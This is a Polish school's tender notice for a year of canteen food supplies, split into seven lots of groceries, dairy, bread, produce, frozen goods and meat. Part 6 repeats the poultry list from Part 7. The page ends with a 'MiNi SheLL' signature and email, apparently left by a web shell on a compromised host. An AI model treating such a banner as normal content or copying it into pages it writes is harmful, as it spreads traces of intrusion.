a) zmiana danych Wykonawcy ( np. zmiana adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy,
b) podwyższenia jakości parametrów lub innych cech charakterystycznych dla przedmiotu dostawy,  nazwy własnej produktu, pod warunkiem wprowadzenia na rynek produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych  cechach charakterystycznych przy zachowaniu ceny oferowanej dla danego produktu na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
c) w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostawy, możliwość dostarczenia odpowiednich towarów objętych umową, o parametrach nie gorszych, niż towary objęte oferta, przy zachowaniu ceny ofertowej towaru, na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
d) w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mogą ulec zmianie terminy sukcesywnych dostaw objętych niniejsza umową,
e) w przypadku, gdy liczba dzieci uczęszczających do szkoły i korzystających z obiadów zwiększy się w stosunku do planowanej liczby uczniów, dokonanie zwiększenia górnej granicy kwoty umowy o max. 10%, zamówienia podstawowego.
3.Wszelkie zmiany postanowień niniejszej umowy wymagają dla swej ważności zachowania formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.moszczenica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. św. Stanisława Kostki w Moszczenicy, Dworcowa 9, 97-310 Moszczenica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 09:30, miejsce: Szkoła Podstawowa im. św. Stanisława Kostki w Moszczenicy, Dworcowa 9, 97-310 Moszczenica - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE SUCHE  , PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE, PRODUKTY GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT Wartość netto  
Wartość brutto
1	2	3	4	5	6	7	8	9
1	Cukier kryształ biały 1kg	kg	200					
2	Soki 430 ml	szt.	100					
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40 280g	szt.	250					
4	Groch łupany  400 g 	kg	60					
5	Groszek konserwowy puszka 400g	szt.	30					
6	Ogórek konserwowy w słoiku 870 ml	szt.	120					
7	Aromat waniliowy 10 ml.	szt.	20					
8	Cukier puder 0,4 kg	szt.	30
9.	Jajka kurze kl. A	szt.	6500					
10.	Koncentrat pomidorowy 30% 215 g	szt.	290					
11.	Kasza jęczmienna średnia  1kg	kg	25					
12.	Barszcz czerwony w proszku  Winiary 60 g             	kg	130		
13.	Proszek do pieczenia 30g	szt.	20					
14.	Zupa grzybowa 48 g	szt.	100					
15.	Cynamon 27g	szt.	20					
16.	Cukier waniliowy 32 g	szt.	35					
17.	Chrzan 290 g	szt.	25					
18.	Mąka pszenna 1kg	kg	420					
19.	Majeranek 10 g	szt.	45					
20.	Przyprawa do zup płynna 200 g	L 100					
21.	Majonez 600 g	szt.	45					
22.	Olej spożywczy rzepakowy 1 l. szt. 380					
23.	Pieprz czarny mielony 20g-25g	szt.	120					
24.	Ryż biały  1kg	kg	110					
25.	Sól sodowo-potasowa 1kg	kg	120					
26.	Sos do spaghetti torebka 45-51 g	szt. 	80					
27.	Zupa barszcz biały Winiary 42-66 g	szt. 	50					
28.	Barszcz biały butelka 0,4l	szt.	160					
29.	Fasola Jaś średnia 1 kg	kg	130					
30.	Kostki rosołowe drobiowe 180g	szt. 	60					
31.	Kwasek cytrynowy 20g	szt.	50					
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g szt.	120	
33.	Kasza manna 1 kg	kg	90					
34.	Mąka ziemniaczana1 kg	kg	10					
35.	Żurek w torebce Winiary 49 g	szt. 	80					
36.	Kisiel Winiary 77 g	szt.	150					
37.	Zupa pieczarkowa Delekta 50 g 	szt. 	100					
38.	Sos ciemny pieczeniowy Winiary 30 g	kg	180					
39.	Makaron kolanko z falbanką 1 kg szt.	130					
40.	Makaron spaghetti  0,4 kg	szt.	250					
41.	Makaron świderki 1kg	kg	300					
42.	Makaron rurka Lubella 0,4 kg	szt.	120	
43.	Makaron do rosołu Czaniec 0,5 kg	szt.	100	
44.	Makaron muszelki Lubella 400 g	szt.	160					
45.	Makaron zacierka Goliard 0,25 kg	szt. 	160	
46.	Sos do sałatek różne smaki Knorr 9 g	szt.	130	
47.	Rodzynki 100 g	szt. 	40	
48.	Sos do potraw chińskich Łowicz  520 g	szt.	50	
49.	Sos do spaghetti Łowicz - 520 g	szt. 	130	
50.	Pieprz ziarnisty 20 g	szt. 	20	
51.	Delikat do mięs Knorr 200 g	szt.	65		
52.	Przyprawa Złocisty kurczak 40 g	szt.	50		
53.	Koncentrat buraczany Pińczów 330 ml	szt. 	70		
54.	Kasz jęczmienna gruba 1 kg	kg	100		
55.	Czosnek granulowany     20 g	szt.	40		
56.	Fasola Jaś drobny 1 kg	szt.	40			
57.	Pierogi z serem 0,45 kg	kg 	200			
58.	Pierogi z mięsem 0,45 kg	kg	130				
59.	Pierożki delikatesowe (uszka) 0,3 kg	kg	70					
60.	Pierogi z kapustą i mięsem 0,45 kg	kg	200			
61.	Kopytka 0,45 kg	kg	280				
62.	Kluski leniwe 0,45 kg	kg	200					
63.	Koncentrat szczawiowy Łowicz 330 g	szt.	60					
64.	Sos słodko-kwaśny Łowicz 520 g	szt.	60					
65.	Płatki kukurydziane Lubella 500 g	kg	8					
66.	Ziele angielskie Interjarek 15 g	szt.	20					
67.	Galaretka (różne smaki) Delecta 75 g	szt.	170					
68.	Budyń - różne smaki Delecta 64 g	szt.	130					
69.	Liść laurowy Interjarek 8 g	szt. 	25					
70.	Sos myśliwski Winiary 30 g	szt.	30			
71.	Kasza jęczmienna pęczak	kg	40					
72.	Makaron łazanki Lubella 500 g	kg	30					
73.	Kasza jaglana Kupiec 0,4 kg	kg	30					
74.	Kasza gryczana Eska 0,5 kg	kg	30					
75.	Ryż brązowy Kupiec 4x100g	kg	20					
76.	Makaron pełnoziarnisty rurki Lubella 0,4 kg	kg	30				
77.	Makaron pełnoziarnisty Lubella świderki 0,4 kg	kg	40			
78.	Oliwa z oliwek Basso 250 ml	szt.	10					
79.	Musztarda sarepska Devaley 210g	szt.	20					
80.	Miód pszczeli lipowy Barć 1250g	szt.	3					
81.	Płatki migdałowe Sjesta 60g	szt.	10					
82.	Oregano Prymat 10g	szt.	40					
83.	Bazylia Kamis 10g	szt.	40					
84.	Zioła prowansalskie Kamis 10g	szt.	40					
85.	Tymianek Kamis 10g	szt.	40					
86.	Pieprz cytrynowy Kamis 20g	szt.	20					
87.	Przyprawa curry Apetita 20g	szt.	20					
88.	Przyprawa gyros Kamis 30g	szt.	20					
89.	Przyprawa lubczyk Prymat 10g	szt.	10					
90.	Soki owocowe Hortex Scoby-Doo 200 ml	szt.	1350				
91.	Woda mineralna Jurajska Junior 0,33 l	szt.	1350					
93.	Soki owocowe Hortex Tygrysek 200 ml	szt.	1350					
94.	Przyprawa kebab Kamis 25g	szt.	20					
95.	Sos myśliwski Łowicz 520g	szt.	30					
96. 	Przyprawa rozmaryn Kamis 15g	szt.	10				 	 	 
Zadanie 1  (artykuły spożywcze suche, przyprawowe i przetwory owocowo-warzywne) 
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %
1	2	3	4	5	6	7
1.	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	160	
2.	Mleko 2% 1L	L	850			
3.	Śmietana 12% 400g Hej	l	1400			
4.	Serek topiony o zawartości tłuszczu nie mniej niż 25% Hochland 100g	kg	40			
5.	Twaróg biały półtłusty Czrnocin  1 kg	kg	200			
6.	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	60			
7.	Kefir  Czarnocin 400 ml	szt.	160			
8.	Kefir Czarnocin  150 g	szt.	2700			
9.	Zsiadłe mleko 200 ml	szt.	820		
10.	Ser Feta	szt.	30		
11. 	Ser parmezan	kg	30			
12.	Ser mozzarella	kg	40		
13.	Jogurt naturalny Czarnocin
150 g	szt.	5700			
14.	Jogurt naturalny Czarnocin
370 g 	szt.	80			
Zadanie 2  ( nabiał ) -  codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto
1	2	3	4	5	6	7	8	9
1.	Bułka zwykła 100g	szt. 	600					
2.	Bułka tarta 1kg	kg	150					
3.	Chleb krojony pszenno-żytni jasny 600g-900g	szt.	750			
4.	Chleb żytni	szt. 	100					
5.	Drożdże 100 g	kg	20				 	 	 	 	 	 
Zadanie 3  ( pieczywo ) - codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA i OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 	Cena  netto za jednostkę	Stawka VAT %	Wartość netto 	 Wartość brutto
1	2	3	4	5	6	7	8
1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6000			
2	Kapusta biała świeża	kg	460				
3	Marchew korzeń	kg	620				
4	Cebula biała korzeń	kg	100				
5	Pieczarki gat I	kg	150				
6	Rzodkiewka	pęczek	120				
7	Ogórek  zielony świeży	kg	200				
8.	Buraki czerwone świeże	kg	400				
9.	Kapusta kwaszona	kg	400				
10.	Jabłka gat. I	kg	2200				
11.	Kapusta pekińska świeża	kg	130				
12.	Fasola czerwona konserwowa 400 g	szt.	25				
13.	Seler korzeń	kg	280				
14.	Pomidory świeże	kg	50				
15.	Sałata zielona	szt.	300				
16.	Kapusta czerwona świeża	kg	180				
17.	Por 	szt.	250				
18.	Koper zielony świeży	pęczek	50				
19.	Pietruszka korzeń	kg	240				
20.	Kalafior 	szt	180				
21.	Banany 	kg	1200				
22.	Papryka świeża czerwona	kg	20				
23.	Ogórek kiszony	kg	400				
24. 	Mandarynki 	kg	650				
25. 	Pomarańcza 	kg	480				
26.	Kukurydza konserwowa 400 g	szt. 	30				
27.	Nektarynki	kg	360			
28.	Gruszki	kg	370			
29.	Czosnek główka	szt.	20				
30.	Natka pietruszki	pęczek	30				
31.	Arbuz	kg	100				
32.	Brzoskwinia	kg	300				
33.	Ananas świeży	szt.	120				
34.	Cukinia	kg	10				
35.	Kiwi	kg	300				
36.	Śliwki Węgierki	kg	250					 	 	 	
Zadanie 4  ( warzywa i owoce ) - codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI i RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę 	Stawka VAT %	Wartość netto 	 Wartość brutto
1	2	3	4	5	6	7	8	9
1.	Fasolka szparagowa 450g	szt.	220					
2.	Kalafior  450 g	szt.	220					
3.	Mieszanka jarzynowa 8-składnikowa 450g	szt.	200			
4.	Marchew mrożona mini 450 g	szt.	190					
5.	Mieszanka kompotowa o,45 kg	szt.	320					
6.	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	150	
7.	Filet z miruny bez skóry	kg	590					
8.	Dorsz - płaty	kg	180					
9. 	Sola - płaty	kg	150					
10.	Brokuły 450 g	szt.	200					
11.	Brukselka 450 g	szt.	100					
12.	Truskawka mrożona o,45 kg	szt.	150					
13.	Wiśnie mrożone 0,5 kg	szt. 	120					
14.	Barszcz ukraiński 450 g	szt.	100		
15.	Mieszanka chińska 450 g	szt.	60		
16.	Marchew mrożona kostka 45o g	szt.	35		
17.	Frytki 2,5 kg	szt.	180		
18.	Szpinak mrożony Iglotex 0,45 kg	szt.	40					
19.	Groszek zielony mrożony Iglotex       0,45 kg	szt.	30
Zadanie 5  ( mrożonki i ryby ) - 2 razy w tygodniu od godz. 6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena  netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto
1	2	3	4	5	6	7	8
1.	Filet z kurczaka surowy	kg	330				
2.	Kurczak	kg	350				
4.	Udziec z kurczaka	kg	550				
5.	Porcja rosołowa b/skrz.	kg	180				
6.	Wątróbka drobiowa	kg	150				
7.	Mięso mielone drobiowe	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MIĘSO DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena  netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto




1	2	3	4	5	6	7	8

1.	Filet z kurczaka surowy	kg	330				
2.	Kurczak	kg	350				
4.	Udziec z kurczaka	kg	550				
5.	Porcja rosołowa b/skrz.	kg	180				
6.	Wątróbka drobiowa	kg	150				
7.	Mięso mielone drobiowe	kg	120				
Zadanie 7 (mięso drobiowe)
- codziennie od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com